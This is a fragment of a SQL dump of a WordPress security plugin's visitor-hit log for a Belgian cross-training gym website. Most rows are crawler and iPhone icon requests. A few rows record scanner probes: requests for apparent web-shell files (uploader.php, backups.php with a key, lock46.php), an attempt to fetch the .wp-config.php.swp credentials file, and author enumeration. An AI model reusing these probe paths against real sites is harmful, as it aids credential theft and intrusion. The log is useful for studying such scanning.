(76948, 1499677633.484619, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76949, 1499677634.056461, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76950, 1499677634.516452, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76951, 1499677635.009688, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76952, 1499677635.523317, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76953, 1499677636.000049, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76954, 1499684999.704908, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76955, 1499687501.655533, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76956, 1499687502.321011, 1463832178, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76957, 1499687502.814882, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76958, 1499687503.237921, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76959, 1499687503.678555, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76960, 1499687504.133946, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76961, 1499687504.749321, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76962, 1499687505.201057, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76963, 1499687505.631662, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76964, 1499687506.092583, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76965, 1499687506.517647, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76966, 1499689996.942235, 1584228905, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76967, 1499690263.356607, 633034955, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/uploader.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76968, 1499691334.809262, 3107193141, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/backups.php?mode=config&key=C6y1F2EA7217PBTL1FlcH98sOpfo/r1Z76/OKFae', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76969, 1499698074.498893, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76970, 1499698075.022622, 1463832178, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76971, 1499698075.509689, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76972, 1499698075.939634, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76973, 1499698076.379976, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76974, 1499698076.822748, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76975, 1499698077.317913, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76976, 1499698077.767758, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76977, 1499698078.191418, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76978, 1499698078.625375, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76979, 1499698079.063445, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76980, 1499698453.482468, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76981, 1499698454.046189, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76982, 1499698454.518223, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76983, 1499698454.954457, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76984, 1499698455.415307, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76985, 1499698455.851321, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76986, 1499698456.334366, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76987, 1499698456.744448, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76988, 1499698457.164033, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76989, 1499698457.586251, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76990, 1499698457.998949, 1463832178, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76991, 1499702971.496586, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76992, 1499703092.741567, 919627301, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76993, 1499703093.243559, 919627301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76994, 1499707019.145364, 84818769, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(76995, 1499707039.449260, 84818769, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(76996, 1499708881.770800, 583808072, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?author=2', '', ''),
(76997, 1499710914.064997, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76998, 1499710914.511648, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76999, 1499713689.838932, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(77000, 1499713922.280646, 1463832178, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77001, 1499714556.907256, 620874844, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/.wp-config.php.swp', 'http://www.crosstrainingcenter.be/.wp-config.php.swp', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(77002, 1499722203.073823, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(77003, 1499722203.665020, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77004, 1499722204.135103, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77005, 1499722204.654816, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77006, 1499722205.151489, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77007, 1499722205.579354, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77008, 1499722206.317771, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77009, 1499722206.855817, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(77010, 1499722207.311940, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77011, 1499722208.023254, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77012, 1499722208.519800, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77013, 1499722209.137290, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77014, 1499722209.655750, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77015, 1499722210.182478, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77016, 1499733280.615618, 1123632645, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(77017, 1499736701.022361, 1123631127, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77018, 1499736702.466663, 1123632645, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77019, 1499736702.966762, 1123632645, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77020, 1499741958.982372, 84848372, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(77021, 1499741959.585982, 84848372, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(77022, 1499744636.733261, 2637637397, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77023, 1499746845.086358, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77024, 1499747177.424106, 1379793056, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'GoogleEarth/7.1.2.2041(Windows;Microsoft Windows (6.2.9200.0);it;kml:2.2;client:Free;type:default)'),
(77025, 1499747178.606478, 1379793056, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(77026, 1499747180.207873, 1379793056, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(77027, 1499747206.250998, 3458838893, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(77028, 1499751715.971845, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77029, 1499755510.998288, 1192045327, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(77030, 1499755515.416688, 1192045327, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(77031, 1499755517.653302, 1192045327, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(77032, 1499757172.594310, 3273261687, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77033, 1499757173.348674, 3273261687, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77034, 1499757173.896597, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77035, 1499757174.455516, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77036, 1499757174.896852, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77037, 1499757175.358674, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77038, 1499757175.947212, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77039, 1499757176.441901, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77040, 1499757176.937436, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77041, 1499757177.451781, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77042, 1499757177.882061, 3273261687, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77043, 1499762619.890748, 2631448407, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-admin/includes/lock46.php', 'http://crosstrainingcenter.be/wp-admin/includes/lock46.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(77044, 1499764178.260088, 2745986569, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77045, 1499764186.854709, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77046, 1499764196.671359, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77047, 1499764204.077532, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/feed/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77048, 1499764204.676748, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77049, 1499764205.089543, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77050, 1499764212.296300, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77051, 1499764218.382533, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77052, 1499764223.166673, 2745986569, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'),
(77053, 1499766934.170189, 1375113052, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77054, 1499770829.150793, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(77055, 1499770829.646396, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77056, 1499770830.068356, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77057, 1499770830.479570, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77058, 1499770831.324270, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77059, 1499770831.771188, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77060, 1499770832.172906, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77061, 1499770832.612925, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77062, 1499770833.014520, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77063, 1499770833.416001, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77064, 1499770833.803215, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77065, 1499770834.261165, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77066, 1499770834.664804, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77067, 1499770835.087259, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77068, 1499775812.509888, 3154445620, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77069, 1499775813.050545, 3154445620, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77070, 1499775813.501846, 3154445620, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77071, 1499775813.961738, 3154445620, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77072, 1499775814.435769, 3154445620, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
